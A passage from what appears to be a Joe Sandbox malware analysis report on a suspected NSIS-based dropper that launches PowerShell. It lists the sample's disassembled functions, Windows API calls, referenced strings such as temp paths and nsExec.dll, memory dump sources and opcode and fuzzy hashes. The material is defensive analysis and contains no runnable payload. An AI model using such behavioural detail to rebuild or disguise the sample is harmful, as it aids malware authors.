                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: ExecToStack
                                                                        • API String ID: 3677997916-166031814
                                                                        • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                        • Instruction ID: 2fd967afc3cf920b801d0ff69ba4d64ac6492d281fb7c7a5729fe10eb95daac3
                                                                        • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                        • Instruction Fuzzy Hash: F4011A3255020AEADB219F56ED09EDB3BACEF85350F00403AF945D6260D335EA64DBF9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405935 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 0040593B
                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 00405945
                                                                        • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405935
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-3081826266
                                                                        • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                        • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                        • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                        • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                        • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                        • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                          • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                        • String ID:
                                                                        • API String ID: 1404258612-0
                                                                        • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                        • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                        • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                        • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                          • Part of subcall function 00405194: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00402D94), ref: 004051EF
                                                                          • Part of subcall function 00405194: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll), ref: 00405201
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                          • Part of subcall function 00405665: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                          • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                        • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 3585118688-0
                                                                        • Opcode ID: 9cf1b004e652727917d33817f691773bcc02be4157d63994a5243a47c86c3d19
                                                                        • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                        • Opcode Fuzzy Hash: 9cf1b004e652727917d33817f691773bcc02be4157d63994a5243a47c86c3d19
                                                                        • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405108 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00405137
                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                          • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                        • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                        • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                        • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405665 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                        • CloseHandle.KERNEL32(?), ref: 00405697
                                                                        Strings
                                                                        • Error launching installer, xrefs: 00405678
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                        • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                        • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                        • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040381F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF2EE0,004037F6,74DF3420,00403621,?), ref: 00403839
                                                                        • GlobalFree.KERNEL32(?), ref: 00403840
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403831
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Free$GlobalLibrary
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 1100898210-3081826266
                                                                        • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                        • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                        • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                        • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405981 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\160420241245287.exe,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00405987
                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\160420241245287.exe,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00405997
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\Users\user\Desktop
                                                                        • API String ID: 2709904686-224404859
                                                                        • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                        • Instruction ID: e5431d3d33a146c3150d202dfaa2e9e12a1dec100281116c20088c3141bfb115
                                                                        • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                        • Instruction Fuzzy Hash: C6D05EA2414920DED3226704DC44AAFA3ACEF113107894466F901E61A5D7785C808AFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405ABB Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                        • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                        • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                        • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                        • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                        • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                        • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        Function 04BDF108 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \V7k
                                                                        • API String ID: 0-2194220512
                                                                        • Opcode ID: c5a730f8e42d117022c46b247c2e16526add197295cde56e204d407c1a4006ad
                                                                        • Instruction ID: 5a03310a6b2cd7193a0f51dc39e168dd1e62cdd3e8e93edc2af364356091915d
                                                                        • Opcode Fuzzy Hash: c5a730f8e42d117022c46b247c2e16526add197295cde56e204d407c1a4006ad
                                                                        • Instruction Fuzzy Hash: E2B15E70E04209DFDF14CFA9D8857ADBBF2EF88314F1485A9E816A7254EB74A845CF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BDF9D8 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e4483ad1209d7f8ffc2b8ffb64b17a6971047bcbc101586440aa96da3efa5fa
                                                                        • Instruction ID: fff8714122688a27db9780c0e9a087ebe729e46cea27f7662b46832f865b66d1
                                                                        • Opcode Fuzzy Hash: 0e4483ad1209d7f8ffc2b8ffb64b17a6971047bcbc101586440aa96da3efa5fa
                                                                        • Instruction Fuzzy Hash: 4EB17170E046099FDB14CFA8C9817ADBBF2EF88314F1485A9D816EB254FB74A841CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4C818 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tPqq$tPqq$$qq$$qq$$qq$$qq$$qq$$qq
                                                                        • API String ID: 0-2594718439
                                                                        • Opcode ID: b60532bd619379ada538a8072aec8b26f642ef017e368ec38ecde3448b2ae43e
                                                                        • Instruction ID: 23e6e735d1d647e4abbc1ecf2b20b86ae12781ce6d82c0c0101cb68775fd4d02
                                                                        • Opcode Fuzzy Hash: b60532bd619379ada538a8072aec8b26f642ef017e368ec38ecde3448b2ae43e
                                                                        • Instruction Fuzzy Hash: 7FE1A2B5B01215DFCB14CB68C451AAABBF2EFC9321F14C46AD919AB355CB32DC41CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A44BE8 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$4'qq$4'qq
                                                                        • API String ID: 0-4257899170
                                                                        • Opcode ID: 4986960f5c8d77e60787eb33c7566bc993546850fecb65c8d3b27af5b8384dc6
                                                                        • Instruction ID: 8d9b94e1c017cbdf948c36b6eb59292ed9538a68ab1251a5cd1b2bf0c86b3c45
                                                                        • Opcode Fuzzy Hash: 4986960f5c8d77e60787eb33c7566bc993546850fecb65c8d3b27af5b8384dc6
